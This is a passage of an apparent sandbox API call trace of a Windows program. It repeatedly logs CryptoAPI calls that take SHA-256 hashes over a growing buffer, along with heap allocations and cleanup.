phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822dd0) returned 1 [0183.427] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.427] CryptHashData (hHash=0x3396ecc0, pbData=0x32e786e0, dwDataLen=0xc0, dwFlags=0x0) returned 1 [0183.427] CryptGetHashParam (in: hHash=0x3396ecc0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.427] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f7e0 [0183.427] CryptGetHashParam (in: hHash=0x3396ecc0, dwParam=0x2, pbData=0x32e6f7e0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6f7e0, pdwDataLen=0xcdfdc) returned 1 [0183.427] CryptDestroyHash (hHash=0x3396ecc0) returned 1 [0183.427] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0183.427] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338220d0) returned 1 [0183.428] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.428] CryptHashData (hHash=0x3396f3c0, pbData=0x32e786e0, dwDataLen=0xe0, dwFlags=0x0) returned 1 [0183.428] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.428] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70980 [0183.428] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x2, pbData=0x32e70980, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e70980, pdwDataLen=0xcdfdc) returned 1 [0183.428] CryptDestroyHash (hHash=0x3396f3c0) returned 1 [0183.428] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0183.433] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823ad0) returned 1 [0183.434] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.434] CryptHashData (hHash=0x3396ea20, pbData=0x32e786e0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0183.434] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.434] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70140 [0183.434] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32e70140, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e70140, pdwDataLen=0xcdfdc) returned 1 [0183.434] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.434] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0183.434] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823ad0) returned 1 [0183.435] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.435] CryptHashData (hHash=0x3396f3c0, pbData=0x32e786e0, dwDataLen=0x120, dwFlags=0x0) returned 1 [0183.435] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.435] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70170 [0183.435] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x2, pbData=0x32e70170, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e70170, pdwDataLen=0xcdfdc) returned 1 [0183.435] CryptDestroyHash (hHash=0x3396f3c0) returned 1 [0183.435] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0183.435] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338227d0) returned 1 [0183.436] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.436] CryptHashData (hHash=0x3396ea20, pbData=0x32e786e0, dwDataLen=0x140, dwFlags=0x0) returned 1 [0183.436] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.436] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e703e0 [0183.436] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32e703e0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e703e0, pdwDataLen=0xcdfdc) returned 1 [0183.436] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.436] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0183.436] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338229d0) returned 1 [0183.436] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.436] CryptHashData (hHash=0x3396eb00, pbData=0x32e786e0, dwDataLen=0x160, dwFlags=0x0) returned 1 [0183.436] CryptGetHashParam (in: hHash=0x3396eb00, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.436] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70440 [0183.436] CryptGetHashParam (in: hHash=0x3396eb00, dwParam=0x2, pbData=0x32e70440, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e70440, pdwDataLen=0xcdfdc) returned 1 [0183.436] CryptDestroyHash (hHash=0x3396eb00) returned 1 [0183.436] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0183.436] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338223d0) returned 1 [0183.437] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.437] CryptHashData (hHash=0x3396f3c0, pbData=0x32e786e0, dwDataLen=0x180, dwFlags=0x0) returned 1 [0183.437] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.437] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e704a0 [0183.437] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x2, pbData=0x32e704a0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e704a0, pdwDataLen=0xcdfdc) returned 1 [0183.437] CryptDestroyHash (hHash=0x3396f3c0) returned 1 [0183.437] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0183.437] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821ed0) returned 1 [0183.438] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.438] CryptHashData (hHash=0x3396f3c0, pbData=0x32e786e0, dwDataLen=0x1a0, dwFlags=0x0) returned 1 [0183.438] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.438] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70620 [0183.438] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x2, pbData=0x32e70620, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e70620, pdwDataLen=0xcdfdc) returned 1 [0183.438] CryptDestroyHash (hHash=0x3396f3c0) returned 1 [0183.438] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0183.438] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338237d0) returned 1 [0183.438] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.438] CryptHashData (hHash=0x3396f5f0, pbData=0x32e786e0, dwDataLen=0x1c0, dwFlags=0x0) returned 1 [0183.438] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.438] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e706b0 [0183.438] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x2, pbData=0x32e706b0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e706b0, pdwDataLen=0xcdfdc) returned 1 [0183.438] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0183.438] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0183.438] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338227d0) returned 1 [0183.439] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.439] CryptHashData (hHash=0x3396ee10, pbData=0x32e786e0, dwDataLen=0x1e0, dwFlags=0x0) returned 1 [0183.439] CryptGetHashParam (in: hHash=0x3396ee10, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.439] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70710 [0183.439] CryptGetHashParam (in: hHash=0x3396ee10, dwParam=0x2, pbData=0x32e70710, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e70710, pdwDataLen=0xcdfdc) returned 1 [0183.439] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0183.439] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0183.439] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338237d0) returned 1 [0183.440] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.440] CryptHashData (hHash=0x3396f3c0, pbData=0x32e786e0, dwDataLen=0x200, dwFlags=0x0) returned 1 [0183.440] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.440] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e706e0 [0183.440] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x2, pbData=0x32e706e0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e706e0, pdwDataLen=0xcdfdc) returned 1 [0183.440] CryptDestroyHash (hHash=0x3396f3c0) returned 1 [0183.440] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0183.440] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338234d0) returned 1 [0183.441] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.441] CryptHashData (hHash=0x3396f3c0, pbData=0x32e786e0, dwDataLen=0x220, dwFlags=0x0) returned 1 [0183.441] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.441] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70890 [0183.441] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x2, pbData=0x32e70890, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e70890, pdwDataLen=0xcdfdc) returned 1 [0183.441] CryptDestroyHash (hHash=0x3396f3c0) returned 1 [0183.441] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0183.441] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821fd0) returned 1 [0183.441] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.441] CryptHashData (hHash=0x3396ecc0, pbData=0x32e786e0, dwDataLen=0x240, dwFlags=0x0) returned 1 [0183.442] CryptGetHashParam (in: hHash=0x3396ecc0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.442] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e707d0 [0183.442] CryptGetHashParam (in: hHash=0x3396ecc0, dwParam=0x2, pbData=0x32e707d0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e707d0, pdwDataLen=0xcdfdc) returned 1 [0183.442] CryptDestroyHash (hHash=0x3396ecc0) returned 1 [0183.442] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0183.442] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822cd0) returned 1 [0183.442] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.442] CryptHashData (hHash=0x3396f3c0, pbData=0x32e786e0, dwDataLen=0x260, dwFlags=0x0) returned 1 [0183.442] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.442] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70800 [0183.442] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x2, pbData=0x32e70800, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e70800, pdwDataLen=0xcdfdc) returned 1 [0183.442] CryptDestroyHash (hHash=0x3396f3c0) returned 1 [0183.442] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0183.442] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822dd0) returned 1 [0183.443] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.443] CryptHashData (hHash=0x3396ea20, pbData=0x32e786e0, dwDataLen=0x280, dwFlags=0x0) returned 1 [0183.443] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.443] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70a10 [0183.443] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32e70a10, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e70a10, pdwDataLen=0xcdfdc) returned 1 [0183.443] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.443] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0183.443] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338228d0) returned 1 [0183.449] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.450] CryptHashData (hHash=0x3396f3c0, pbData=0x32e786e0, dwDataLen=0x2a0, dwFlags=0x0) returned 1 [0183.450] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.450] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e715b0 [0183.450] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x2, pbData=0x32e715b0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e715b0, pdwDataLen=0xcdfdc) returned 1 [0183.450] CryptDestroyHash (hHash=0x3396f3c0) returned 1 [0183.450] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0183.450] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338238d0) returned 1 [0183.450] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.450] CryptHashData (hHash=0x3396ea20, pbData=0x32e786e0, dwDataLen=0x2c0, dwFlags=0x0) returned 1 [0183.450] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.450] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e711f0 [0183.450] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32e711f0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e711f0, pdwDataLen=0xcdfdc) returned 1 [0183.450] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.450] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0183.450] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338237d0) returned 1 [0183.451] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.451] CryptHashData (hHash=0x3396ecc0, pbData=0x32e786e0, dwDataLen=0x2e0, dwFlags=0x0) returned 1 [0183.451] CryptGetHashParam (in: hHash=0x3396ecc0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.451] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e710d0 [0183.451] CryptGetHashParam (in: hHash=0x3396ecc0, dwParam=0x2, pbData=0x32e710d0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e710d0, pdwDataLen=0xcdfdc) returned 1 [0183.451] CryptDestroyHash (hHash=0x3396ecc0) returned 1 [0183.451] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0183.451] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821dd0) returned 1 [0183.452] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.452] CryptHashData (hHash=0x3396f4a0, pbData=0x32e786e0, dwDataLen=0x300, dwFlags=0x0) returned 1 [0183.452] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.452] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71430 [0183.452] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e71430, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71430, pdwDataLen=0xcdfdc) returned 1 [0183.452] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.452] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0183.452] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338222d0) returned 1 [0183.452] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.452] CryptHashData (hHash=0x3396ea90, pbData=0x32e786e0, dwDataLen=0x320, dwFlags=0x0) returned 1 [0183.452] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.452] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70c50 [0183.452] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x2, pbData=0x32e70c50, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e70c50, pdwDataLen=0xcdfdc) returned 1 [0183.452] CryptDestroyHash (hHash=0x3396ea90) returned 1 [0183.452] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0183.452] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823bd0) returned 1 [0183.453] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.453] CryptHashData (hHash=0x3396ea20, pbData=0x32e786e0, dwDataLen=0x340, dwFlags=0x0) returned 1 [0183.453] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.453] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70fb0 [0183.453] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32e70fb0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e70fb0, pdwDataLen=0xcdfdc) returned 1 [0183.453] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.453] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0183.453] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338230d0) returned 1 [0183.454] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.454] CryptHashData (hHash=0x3396eb00, pbData=0x32e786e0, dwDataLen=0x360, dwFlags=0x0) returned 1 [0183.454] CryptGetHashParam (in: hHash=0x3396eb00, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.454] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e71220 [0183.454] CryptGetHashParam (in: hHash=0x3396eb00, dwParam=0x2, pbData=0x32e71220, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e71220, pdwDataLen=0xcdfdc) returned 1 [0183.454] CryptDestroyHash (hHash=0x3396eb00) returned 1 [0183.454] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0183.454] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338227d0) returned 1 [0183.454] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.454] CryptHashData (hHash=0x3396f4a0, pbData=0x32e786e0, dwDataLen=0x380, dwFlags=0x0) returned 1 [0183.454] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.455] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70ec0 [0183.455] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e70ec0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e70ec0, pdwDataLen=0xcdfdc) returned 1 [0183.455] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0183.455] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0183.455] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822dd0) returned 1 [0183.455] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.455] CryptHashData (hHash=0x3396ea20, pbData=0x32e786e0, dwDataLen=0x3a0, dwFlags=0x0) returned 1 [0183.455] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.455] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70dd0 [0183.455] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32e70dd0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e70dd0, pdwDataLen=0xcdfdc) returned 1 [0183.455] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0183.455] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0183.456] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338221d0) returned 1 [0183.456] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0183.456] CryptHashData (hHash=0x3396ea20, pbData=0x32e786e0, dwDataLen=0x3c0, dwFlags=0x0) returned 1 [0183.456] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0183.456] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e716a0 [0183.456] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, 